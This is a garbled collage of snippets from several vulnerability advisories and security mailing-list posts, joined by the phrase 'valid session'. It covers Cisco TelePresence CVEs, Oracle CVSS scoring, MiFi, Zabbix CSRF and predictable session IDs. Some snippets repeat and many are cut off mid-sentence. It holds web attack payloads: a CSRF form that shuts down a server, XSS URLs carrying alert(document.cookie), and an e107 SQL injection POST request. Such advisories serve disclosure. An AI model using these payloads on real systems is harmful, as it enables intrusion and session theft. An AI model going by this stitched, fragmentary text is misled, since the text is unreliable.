vulnerability, the attacker would need the ability to submit a
crafted request to an affected device on TCP port 80, TCP port 443,
or TCP port 8080.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities.
* Cisco TelePresence Recording Server - CSCtf42005 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0383.
restricted to administrative users only. The attacker would need the
ability to submit a crafted request to an affected device on TCP port
80, 443, or 8080.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities.
* CTMS - CSCtf42008 ( registered customers only) has been assigned
the CVE identifier CVE-2011-0383.
* CTMS - CSCtf01253 ( registered customers only) has been assigned
the CVE identifier CVE-2011-0384.
authenticated attacker to execute arbitrary commands with elevated
privileges. To exploit these vulnerabilities, an attacker must submit
a malformed request to an affected device via TCP port 8082.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit this vulnerability.
* Cisco TelePresence endpoint - CSCtb31640 ( registered customers
only) has been assigned the CVE identifier CVE-2011-0372
CGI Command Injection
The attacker would need the ability to submit a malformed SOAP
request that is designed to trigger the vulnerability to the affected
device on TCP port 8080 or 8443.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit this vulnerability.
* Cisco TelePresence Manager: CSCtc59562 ( registered customers
only) has been assigned the Common Vulnerabilities and Exposures
(CVE) identifier CVE-2011-0380.
Take for example the bug APPS01[1] in Oracle Critical Patch Update of
April 2007 [2], it was a preauthenticated remote bug (with remote I mean
"from internet", not from "adjacent network"). CVSS2 Score would be 9/10
(calcule it yourself [3]), however, the Oracle advisory says that a
"Valid session" was needed and that the CVSS2 score was 4.2. It's funny.
>As a responsible security professional, I have to assume their research
>is accurate and their advisory should be taken more seriously than
>Oracle's.
Take for example the bug APPS01[1] in Oracle Critical Patch Update of
April 2007 [2], it was a preauthenticated remote bug (with remote I mean
"from internet", not from "adjacent network"). CVSS2 Score would be 9/10
(calcule it yourself [3]), however, the Oracle advisory says that a
"Valid session" was needed and that the CVSS2 score was 4.2. It's funny.
>As a responsible security professional, I have to assume their research
>is accurate and their advisory should be taken more seriously than
>Oracle's.
Details
*******
Exploiting this issue may allow a remote attacker to perform certain administrative actions, e.g. change web administration password, upload applications, etc... using predictable URL requests once the user has authenticated and obtained a valid session with the server.
Example [Shutdown Server]:
<html>
<form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1>
vendor lag but it's not all that complicated if you have a MiFi and a
few minutes.
*1. Authentication not required.*
The MiFi does not require a valid session to commit changes to
configuration settings. This makes exploiting the below issues a lot
easier when you don’t have to require that the victim have a valid session.
*2. Enable GPS without the users knowledge.*
random values using the Mersenne Twister algorithm. FWS seeds mt_rand()
every time create_sessionid() is called. mt_rand() will produce the same
set of random values if the same seed is provided. Since the attacker
knows the current time, it will be possible to generate the exact same
session identifiers. Consequently, an attacker will be able to calculate
valid session identifiers, which allows the attacker to manipulate
another user's cart.
includes/readcookie.inc.php:
function create_sessionid($length)
1) XSRF
An attacker may exploit this issue to perform certain administrative actions,
e.g. change using predictable URL requests once the user has authenticated and
obtained a valid session with the switch.
Example
*******
Session IDs are timestamps of when the user logged-in and are trivial to
forge. There are numerous ways of remotely gathering the remote time and
uptime, the easiest being to ask over RPC... Assuming that a user or an
administrator logged into the device shortly after it was powered up, and
that the network connectivity is fast, it is practical to bruteforce a
valid session id.
Using this vulnerability, a non-authenticated attacker can authenticate.
- - Usage of cookies to store credentials
I. BACKGROUND
"ZABBIX is an enterprise-class open source distributed monitoring solution." [1]
II. DETAILS
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist that can allow for the following
attack scenarios to be executed should an administrator with a valid session visit a malicious page
or url.
1. Reset admin password
2. Execution of shell commands
etc. from "false" to "true" an attacker is able to unlock "hidden"
features and e.g. is able to manipulate other profiles on the index page
(other profiles can be deleted!).
3) XSS (valid session necessary, payload will be auto-executed after
login)
http://$host/?dp=reports&p=testprofile&wbsi=";alert(document.cookie);//
http://$host/?dp=reports&p=testprofile&rii=";alert(123);//&wbsi=1279796468489657
Unauthenticated XSS:
Attacker can use browser to exploit this vulnerability. The following PoC code is available:
POST /e107_admin/users_extended.php?cat= HTTP/1.1
Host: HOST
Cookie: <valid session cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length:
user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_read=0&user_write=253&add_category=Add+category
